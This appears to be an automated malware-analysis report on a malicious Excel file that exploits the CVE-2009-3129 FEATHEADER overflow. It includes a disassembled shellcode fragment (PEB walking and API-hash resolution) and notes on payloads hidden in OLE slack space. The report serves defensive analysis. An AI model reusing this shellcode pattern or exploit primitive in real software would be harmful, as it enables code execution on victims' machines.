MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
The critical CVE-2009-3129 heuristic indicates that this Excel file exploits a heap overflow vulnerability to achieve code execution. The suspicious cmd.exe invocation suggests a follow-on action, likely downloading and executing a payload. The embedded URLs, although mostly benign or malformed, point towards potential command and control infrastructure.
Heuristics 5
-
CVE-2009-3129 — Excel FEATHEADER record overflow critical CVE exact CVE_2009_3129Workbook BIFF stream contains a FEATHEADER (Feature Header) record with anomalous size (record_size=22, isf=4, cbHdrData=4). Legitimate FEATHEADER records are tiny (<100 bytes) and carry cbHdrData values that fit in the record body; the value here is the documented CVE-2009-3129 exploit primitive — cbHdrData drives a memcpy with attacker-controlled size, leading to memory corruption and code execution in Excel 2007/2003.
-
PEB access via FS segment (x86) high SC_PEB_ACCESSPEB access via FS segment (x86)
Disassembly
Attempted x86 opcode disassembly00000D0F 64a130000000 mov eax, dword ptr fs:[0x30] 00000D15 90 nop 00000D16 8b400c mov eax, dword ptr [eax + 0xc] 00000D19 90 nop 00000D1A 8b701c mov esi, dword ptr [eax + 0x1c] 00000D1D ad lodsd eax, dword ptr [esi] 00000D1E 8b7008 mov esi, dword ptr [eax + 8] 00000D21 90 nop 00000D22 e98b020000 jmp 0xfb2 00000D27 58 pop eax 00000D28 90 nop 00000D29 81ec00020000 sub esp, 0x200 00000D2F 8bfc mov edi, esp 00000D31 897708 mov dword ptr [edi + 8], esi 00000D34 894710 mov dword ptr [edi + 0x10], eax 00000D37 ff7708 push dword ptr [edi + 8] 00000D3A 68ec97030c push 0xc0397ec 00000D3F e81a020000 call 0xf5e 00000D44 89471c mov dword ptr [edi + 0x1c], eax 00000D47 ff7708 push dword ptr [edi + 8] 00000D4A 68f622b97c push 0x7cb922f6 00000D4F e80a020000 call 0xf5e 00000D54 90 nop 00000D55 894720 mov dword ptr [edi + 0x20], eax 00000D58 ff7708 push dword ptr [edi + 8] 00000D5B 68a517007c push 0x7c0017a5 00000D60 e8f9010000 call 0xf5e 00000D65 894724 mov dword ptr [edi + 0x24], eax 00000D68 ff7708 push dword ptr [edi + 8] 00000D6B 68 .byte 0x68 00000D6C fb sti 00000D6D 97 xchg edi, eax 00000D6E fd std
-
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 261,182 bytes but its declared streams total only 24,565 bytes — 236,617 bytes (91%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.pdf-repair.com In document text (OLE body)
- http://www.pdf-repair.com)/Producer(AdvancedIn document text (OLE body)
- http://www.pdf-repair.com)/ModDate(D:20100406171120+08In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/pdf/1.3/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
Open this report in the interactive analyzer, or submit your own file for analysis.